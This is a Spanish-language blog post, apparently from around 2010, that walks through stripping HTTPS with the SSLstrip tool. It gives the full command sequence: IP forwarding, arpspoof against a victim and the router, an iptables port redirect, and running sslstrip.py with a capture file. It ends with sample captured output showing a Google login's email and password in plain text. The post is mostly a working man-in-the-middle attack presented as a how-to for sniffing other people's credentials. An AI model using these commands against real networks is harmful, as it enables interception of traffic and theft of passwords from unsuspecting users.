HTTPS se considera uno de los protocolos de envío de información por web más seguros, sin embargo y como se suele decir, no es oro todo lo que reluce. En este post voy a presentar una herramienta, SSLstrip, que permite justamente hacer eso, destripar una conexión HTTPS y conseguir ver el contenido transmitido en texto plano.

SSLstrip permite sniffar usuarios y contraseñas transmitidas por HTTPS de forma sencilla. Para realizar el ataque únicamente llega con usar una técnica man-in-the-middle. El equipo intermedio observará todo el tráfico en texto plano.



¿Cómo?

  1. Descargar SSLstrip.
  2. Realizar el ataque MITM.
  3. Observar el tráfico HTTPS de interés.
Ejemplo

Todos los comandos serán ejecutados desde la máquina con IP192.168.1.2.

La última versión de SSLstrip es la 0.7. Para descargarla:

Lo descompimimos y tenemos una nueva carpeta, sslstrip-0.7. Accedemos a ella y desde ahí seguimos con todo el proceso.

tar zxvf sslstrip-0.7.tar.gz
cd sslstrip-0.7/
Ponemos ahora nuestra máquina como router intermedio para el ataque MITM y así permitir el enroutamiento de paquetes.

echo "1" > /proc/sys/net/ipv4/ip_forward
Ahora realizamos el ataque MITM propiamente dicho, para ello usaremos la herramienta arpspoof, con el interfaz de escucha, la IP de la víctima y la IP del router.

arpspoof -i eth0 -t 192.168.1.33 192.168.1.1
Con IPtables cambiamos la redirección de puertos

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
Llegados a este punto, únicamente queda ejecutar SSLstrip para así poder comenzar a capturar datos. Para ello, simplemente le pasamos el fichero de captura.

./sslstrip.py -w captura.cap
Si deseamos ver en tiempo real lo que está capturando, podemos emplear alguna de las utilidades en línea de comandos para hacerlo, como tail.

tail -f captura.cap

2010-09-28 01:35:046,739 SECURE POST Data (www.google.com):
ltmpl=default&ltmplcache=2&continue=http%3A%2F%2Fm ail.google.com%2Fmail%2F%3F&service=mail&rm=false& dsh=6669774865561864179&ltmpl=default&ltmpl=defaul t&scc=1&timeStmp=&secTok=&GALX=dPSLG5jykg8&a
mp;Email=user_prueba&Passwd=mi_passwd&rmShown=1&si gnIn=Acceder&asts=
Más info en: http://blackploit.blogspot.com/2010/...-sslstrip.html